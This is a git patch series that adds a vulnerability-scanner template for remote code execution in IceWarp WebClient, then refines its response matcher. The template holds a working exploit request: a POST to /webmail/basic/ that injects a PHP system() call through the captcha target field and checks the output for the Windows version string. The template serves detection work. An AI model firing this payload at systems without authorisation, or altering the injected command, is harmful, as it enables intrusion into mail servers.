From ef74a354cacc4093cd8bbf2257a0fe8b0e84a70a Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Fri, 9 Jul 2021 13:52:28 +0900 Subject: [PATCH 1/2] Create icewarp-webclient-rce.yaml Signed-off-by: GwanYeong Kim --- .../other/icewarp-webclient-rce.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 vulnerabilities/other/icewarp-webclient-rce.yaml diff --git a/vulnerabilities/other/icewarp-webclient-rce.yaml b/vulnerabilities/other/icewarp-webclient-rce.yaml new file mode 100644 index 0000000000..192fc314c3 --- /dev/null +++ b/vulnerabilities/other/icewarp-webclient-rce.yaml @@ -0,0 +1,28 @@ +id: icewarp-webclient-rce + +info: + name: IceWarp WebClient RCE + author: gy741 + severity: critical + tags: icewarp,rce + reference: https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E + +requests: + - raw: + - | + POST /webmail/basic/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + _dlg[captcha][target]=system(\'ver\')\ + + matchers-condition: and + matchers: + - type: word + words: + - "Microsoft Windows" + part: body + + - type: status + status: + - 302 From a0d643561f5705e37b739e48f24a9f7dbf8ec64d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 10 Jul 2021 09:18:32 +0530 Subject: [PATCH 2/2] Update icewarp-webclient-rce.yaml --- vulnerabilities/other/icewarp-webclient-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/icewarp-webclient-rce.yaml b/vulnerabilities/other/icewarp-webclient-rce.yaml index 192fc314c3..caa8758541 100644 --- a/vulnerabilities/other/icewarp-webclient-rce.yaml +++ b/vulnerabilities/other/icewarp-webclient-rce.yaml @@ -20,7 +20,7 @@ requests: matchers: - type: word words: - - "Microsoft Windows" + - "Microsoft Windows [Version" part: body - type: status